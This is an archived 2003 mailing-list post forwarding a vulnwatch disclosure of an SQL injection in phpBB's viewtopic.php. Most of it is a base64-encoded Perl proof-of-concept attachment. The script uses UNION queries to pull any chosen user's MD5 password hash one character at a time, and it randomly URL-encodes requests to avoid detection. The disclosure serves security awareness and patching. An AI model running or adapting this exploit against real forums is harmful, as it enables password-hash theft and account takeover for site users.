phpBB password disclosure by sql injection
ir0nkid at linuxjunkies.com
ir0nkid at linuxjunkies.com
Fri Jun 20 03:43:43 CDT 2003
--MIMEStream=_0+206527_12638528333_143735178849
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
*heads up*
Thought i would forward this on seeing as how it's one of the most popular
out there right now
-------- Original Message --------
Subject: FW: phpBB password disclosure by sql injection
From: "Jacob Hurley" <jacobh at aos5.com>
To: <ir0nkid at buildtheb0x.com>, <ir0nkid at linuxjunkies.com>
__
| / A__ Jacob Hurley |
| __/ O Linux+, CCNA |
| / S__/ Alexander Open Systems |
| __/ 913.307.2366 |
-----Original Message-----
From: Rick [mailto:rikul at bellsouth.net]
Sent: Thursday, June 19, 2003 2:28 AM
To: vulnwatch at vulnwatch.org
Subject: phpBB password disclosure by sql injection
Hi
There is sql injection vuln in phpBB. The variable "topic_id" is passed
directly from GET to sql query in /viewtopic.php. It can be used
to get md5 passwords for users. I am attaching details and proof of
concept code. I've only tested this on mysql 4 and pgsql at my home
machines so I might have missed something...
Rick Patel
--MIMEStream=_0+206527_12638528333_143735178849
Content-Type: application/DEFANGED-199; name="phpbb_sql_pl_DEFANGED-2.DEFANGED-199"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="phpbb_sql_pl_DEFANGED-2.DEFANGED-199"
IyEvdXNyL2Jpbi9wZXJsIC13DQojDQojDQojCXBocEJCCXBhc3N3b3JkIGRpc2Nsb3N1cmUgdnVs
bi4NCiMJLSByaWNrIHBhdGVsCShyaWt1bDdAeWFob28uY29tKSAtDQojCQ0KIwlUaGVyZSBpcyBh
IHNxbCBpbmplY3Rpb24gdnVsbiB3aGljaCBleGlzdHMgaW4gL3ZpZXd0b3BpYy5waHAgZmlsZS4g
VGhlIHZhcmlhYmxlIGlzICR0b3BpY19pZA0KIwl3aGljaCBnZXRzIHBhc3NlZCBkaXJlY3RseSB0
byBzcWwgc2VydmVyIGluIHF1ZXJ5LiBBdHRhY2tlciBjb3VsZCBwYXNzIGEgc3BlY2lhbCBzcWwg
c3RyaW5nIHdoaWNoDQojCWNhbiB1c2VkIHRvIHNlZSBtZDUgcGFzc3dvcmQgaGFzaCBmb3IgYW55
IHVzZXIgKCEpIGZvciBwaHBCQi4gVGhpcyBwYXNzIGNhbiBiZSBsYXRlciB1c2VkIHdpdGgNCiMJ
YXV0b2xvZ2luIG9yIGNyYWNrZWQgdXNpbmcgam9obi4gIA0KIw0KIwlEZXRhaWxzOiANCiMNCiMJ
dGhpcyBpcyBjaGVja2luZyBkb25lIGZvciAkdG9waWNfaWQgaW4gdmlld3RvcGljLnBocDoNCiMN
CiMJaWYgKCBpc3NldCgkSFRUUF9HRVRfVkFSU1tQT1NUX1RPUElDX1VSTF0pICkNCiMJew0KIwkg
ICAgICAkdG9waWNfaWQgPSBpbnR2YWwoJEhUVFBfR0VUX1ZBUlNbUE9TVF9UT1BJQ19VUkxdKTsN
CiMJfQ0KIwllbHNlIGlmICggaXNzZXQoJEhUVFBfR0VUX1ZBUlNbJ3RvcGljJ10pICkNCiMJew0K
IwkgICAgICAkdG9waWNfaWQgPSBpbnR2YWwoJEhUVFBfR0VUX1ZBUlNbJ3RvcGljJ10pOw0KIwl9
DQojDQojCW9rLi4uIG5vIGVsc2Ugc3RhdGVtZW50IGF0IGVuZCA6KQ0KIwlub3cgaWYgR0VUW3Zp
ZXddPW5ld2VzdCBhbmQgR0VUW3NpZF0gaXMgc2V0LCB0aGlzIHF1ZXJ5IGdldHMgZXhlY3V0ZWQ6
DQojDQojCQkkc3FsID0gIlNFTEVDVCBwLnBvc3RfaWQNCiMgICAgICAgICAgICAgICBGUk9NICIg
LiBQT1NUU19UQUJMRSAuICIgcCwgIiAuIFNFU1NJT05TX1RBQkxFIC4gIiBzLCAgIiAuIFVTRVJT
X1RBQkxFIC4gIiB1DQojICAgICAgICAgICAgICAgV0hFUkUgcy5zZXNzaW9uX2lkID0gJyRzZXNz
aW9uX2lkJw0KIyAgICAgICAgICAgICAgICAgIEFORCB1LnVzZXJfaWQgPSBzLnNlc3Npb25fdXNl
cl9pZA0KIyAgICAgICAgICAgICAgICAgIEFORCBwLnRvcGljX2lkID0gJHRvcGljX2lkDQojICAg
ICAgICAgICAgICAgICAgQU5EIHAucG9zdF90aW1lID49IHUudXNlcl9sYXN0dmlzaXQNCiMgICAg
ICAgICAgICAgICBPUkRFUiBCWSBwLnBvc3RfdGltZSBBU0MNCiMgICAgICAgICAgICAgICBMSU1J
VCAxIjsNCiMNCiMJQWhoISAkdG9waWNfaWQgZ2V0cyBwYXNzZWQgZGlyZWN0eSB0byBxdWVyeS4g
U28gaG93IGNhbiB3ZSB1c2UgdGhpcyB0byBkbyBzb21ldGhpbmcgaW1wb3J0YW50PyBXZWxsDQoj
CUkgZGVjaWRlZCB0byB1c2UgdW5pb24gYW5kIGNyZWF0ZSBhIHNlY29uZCBxdWVyeSB3aWxsIGdl
dCB1cyBzb21ldGhpbmcgdXNlZnVsLiBUaGVyZSB3ZXJlIGNvdXBsZSBvZiANCiMgIAlwcm9ibGVt
cyBpIHJhbiBpbnRvLiBmaXJzdCwgcGhwQkIgb25seSBjYXJlcyBhYm91dCB0aGUgZmlyc3Qgcm93
IHJldHVybmVkLiBzZWNvbmQsIHRoZSBzZWxlY3QgZm9yIGZpcnN0DQojCXF1ZXJ5IGlzIHAucG9z
dF9pZCB3aGljaCBpcyBpbnQsIHNvIGludCBiZWNvbWVzIHRoZSB0eXBlIHJldHVybmVkIGZvciBh
bnkgb3RoZXIgcXVlcnkgaW4gdW5pb24uIHRoaXJkLA0KIwl0aGVyZSBpcyByZXN0IG9mIGp1bmsg
YXQgZW5kICIgQU5EIHAucG9zdF90aW1lID49IC4uLiIgV2UgdGVsbCBteXNxbCB0byBpZ25vcmUg
dGhhdCBieSBwbGFjaW5nIC8qIGF0IGVuZA0KIyAJb2Ygb3VyIGluamVjdGVkIHF1ZXJ5LiBTbyB3
aGF0IHF1ZXJ5IGNhbiB3ZSBtYWtlIHRoYXQgcmV0dXJucyBvbmx5IGludD8gIA0KIwl0aGlzIG9u
ZSA9PiBzZWxlY3Qgb3JkKHN1YnN0cmluZyh1c2VyX3Bhc3N3b3JkLCRpbmRleCwxKSkgZnJvbSBw
aHBiYl91c2VycyB3aGVyZSB1c2VyX2lkID0gJHVpZA0KIwlUaGVuIGFsbCB3ZSBoYXZlIHRvIGRv
IGlzIHF1ZXJ5IDMyIHRpbWVzIHdoaWNoICRpbmRleCBmcm9tIDEtMzIgYW5kIHdlIGdldCBvcmQg
dmFsdWUgb2YgYWxsIGNoYXJzIG9mDQojCW1kNSBoYXNoIHBhc3N3b3JkLiANCiMNCiMgIAlJIGhh
dmUgb25seSB0ZXN0ZWQgdGhpcyB3aXRoIG15c3FsIDQgYW5kIHBnc3FsIC4gTXlzcWwgMy54IGRv
ZXMgbm90IHN1cHBvcnQgdW5pb25zIHNvIHlvdSB3b3VsZCBoYXZlIHRvIHR3ZWFrDQojCXRoZSBx
dWVyeSB0byBkbyBhbnl0aGluZyB1c2VmdWwuIA0KIwkNCiMJVGhpcyBzY3JpcHQgaXMgZm9yIGVk
dWNhdGlvbmFsIHB1cnBvc2Ugb25seS4gUGxlYXNlIGRvbnQgdXNlIGl0IHRvIGRvIGFueXRoaW5n
IGVsc2UuCQ0KIw0KDQp1c2UgSU86OlNvY2tldDsNCg0KJHJlbW90ZSA9IHNoaWZ0IHx8ICdsb2Nh
bGhvc3QnOw0KJHZpZXdfdG9waWMgPSBzaGlmdCB8fCAgJy9waHBCQjIvdmlld3RvcGljLnBocCc7
DQokdWlkID0gc2hpZnQgfHwgMjsNCiRwb3J0ID0gODA7DQoNCiRkYnR5cGUgPSAnbXlzcWw0JzsJ
IyBteXNxbDQgb3IgcGdzcWwgDQoNCg0KcHJpbnQgIlRyeWluZyB0byBnZXQgcGFzc3dvcmQgaGFz
aCBmb3IgdWlkICR1aWQgc2VydmVyICRyZW1vdGUgZGJ0eXBlOiAkZGJ0eXBlXG4iOw0KDQokcCA9
ICIiOw0KDQpmb3IoJGluZGV4PTE7ICRpbmRleDw9MzI7ICRpbmRleCsrKQ0Kew0KCSRzb2NrZXQg
PSBJTzo6U29ja2V0OjpJTkVULT5uZXcoUGVlckFkZHIgPT4gJHJlbW90ZSwNCgkJCQlQZWVyUG9y
dCA9PiAkcG9ydCwNCgkJCQlQcm90byA9PiAidGNwIiwNCgkJCQlUeXBlID0+IFNPQ0tfU1RSRUFN
KQ0KCW9yIGRpZSAiQ291bGRudCBjb25uZWN0IHRvICRyZW1vdGU6JHBvcnQgOiAkQFxuIjsNCgkk
c3RyID0gIkdFVCAkdmlld190b3BpYyIgLiAiP3NpZD0xJnRvcGljX2lkPS0xIiAuICByYW5kb21f
ZW5jb2RlKG1ha2VfZGJzcWwoKSkgLiAgIiZ2aWV3PW5ld2VzdCIgLiAiIEhUVFAvMS4wXG5cbiI7
DQoNCglwcmludCAkc29ja2V0ICRzdHI7DQoJcHJpbnQgJHNvY2tldCAiQ29va2llOiBwaHBCQjJt
eXNxbF9zaWQ9MVxuIjsJIyByZXBsYWNlIHRoaXMgZm9yIHBnc3FsIG9yIHJlbW92ZSBpdA0KCXBy
aW50ICRzb2NrZXQgIkhvc3Q6ICRyZW1vdGVcblxuIjsNCg0KCXdoaWxlICgkYW5zd2VyID0gPCRz
b2NrZXQ+KQ0KCXsNCgkJaWYgKCRhbnN3ZXIgPX4gL0xvY2F0aW9uOi4qXHgyMyhcZCspLykJIyBN
YXRjaGVzIHRoZSBMb2NhdGlvbjogdmlld3RvcGljLnBocD9wPTxudW0+IzxudW0+DQoJCXsNCgkJ
CSRwIC49IGNociAoJDEpOw0KCQl9DQoJfQ0KCQ0KCWNsb3NlKCRzb2NrZXQpOw0KfQ0KDQpwcmlu
dCAiXG5NRDUgSGFzaCBmb3IgdWlkICR1aWQgaXMgJHBcbiI7DQoNCiMgcmFuZG9tIGVuY29kZSBz
dHIuIGhlbHBzIGF2b2lkIGRldGVjdGlvbg0Kc3ViIHJhbmRvbV9lbmNvZGUNCnsNCgkkc3RyID0g
c2hpZnQ7DQoJJHJldCA9ICIiOw0KCWZvcigkaT0wOyAkaTxsZW5ndGgoJHN0cik7ICRpKyspDQoJ
ew0KCQkkYyA9IHN1YnN0cigkc3RyLCRpLDEpOw0KCQkkaiA9IHJhbmQgbGVuZ3RoKCRzdHIpICog
MTAwMDsNCgkJDQoJCWlmIChpbnQoJGopICUgMiB8fCAkYyBlcSAnICcpDQoJCXsNCgkJCSRyZXQg
Lj0gIiUiIC4gc3ByaW50ZigiJXgiLG9yZCgkYykpOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJJHJl
dCAuPSAkYzsNCgkJfQ0KCX0NCglyZXR1cm4gJHJldDsNCn0NCg0Kc3ViIG1ha2VfZGJzcWwNCnsN
CglpZiAoJGRidHlwZSBlcSAnbXlzcWw0JykNCgl7DQoJCXJldHVybiAiIHVuaW9uIHNlbGVjdCBv
cmQoc3Vic3RyaW5nKHVzZXJfcGFzc3dvcmQsIiAuICRpbmRleCAuICIsMSkpIGZyb20gcGhwYmJf
dXNlcnMgd2hlcmUgdXNlcl9pZD0kdWlkLyoiIDsNCgl9IGVsc2lmICgkZGJ0eXBlIGVxICdwZ3Nx
bCcpDQoJew0KCQlyZXR1cm4gIjsgc2VsZWN0IGFzY2lpKHN1YnN0cmluZyh1c2VyX3Bhc3N3b3Jk
IGZyb20gJGluZGV4IGZvciAxKSkgYXMgcG9zdF9pZCBmcm9tIHBocGJiX3Bvc3RzIHAsIHBocGJi
X3VzZXJzIHUgd2hlcmUgdS51c2VyX2lkPSR1aWQgb3IgZmFsc2UiOw0KCX0NCgllbHNlIA0KCXsN
CgkJcmV0dXJuICIiOw0KCX0NCn0NCg==
--MIMEStream=_0+206527_12638528333_143735178849--
More information about the Kclug
mailing list